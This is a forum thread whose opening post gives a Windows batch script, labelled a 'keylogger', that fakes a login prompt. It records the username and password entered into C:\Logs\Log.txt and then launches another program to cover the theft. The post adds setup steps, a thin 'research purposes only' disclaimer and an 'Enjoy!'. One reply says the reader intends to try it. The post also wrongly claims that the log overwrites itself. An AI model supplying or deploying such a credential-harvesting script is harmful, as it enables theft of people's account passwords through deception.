User Controls

Simple Keylogger With Notepad

  1. #1
    The following is to be used for research purposes only, and I take no responsibility for anything done with malicious intent.

    Alright, we're just going to use Notepad to make a simple .bat (Batch) file, keylogger.

    Start by opening Notepad, then pasting in the following code:

    @echo off
    color a
    title Login
    cls
    echo Please Enter Email Adress And Password
    echo.
    echo.
    cd "C:\Logs"
    set /p user=Username:
    set /p pass=Password:
    echo Username="%user%" Password="%pass%" >> Log.txt
    start >>Program Here<<
    exit

    Make a folder on your desktop called "Logs". It must be logs or it will not work.

    Drag that folder into C:\

    Now run a test of your "Logger.bat".

    Once tested, go back to the "Logs" folder in C:\ and there will be a .txt file. If a second entry is made, the .txt will overwrite itself.

    Enjoy!
  2. #2
  3. #3
    infinityshock Black Hole
    Originally posted by Something Squirrel

    im going to try that...seems like a good idea
    The following users say it would be alright if the author of this post didn't die in a fire!
  4. #4
    Lol.
Jump to Top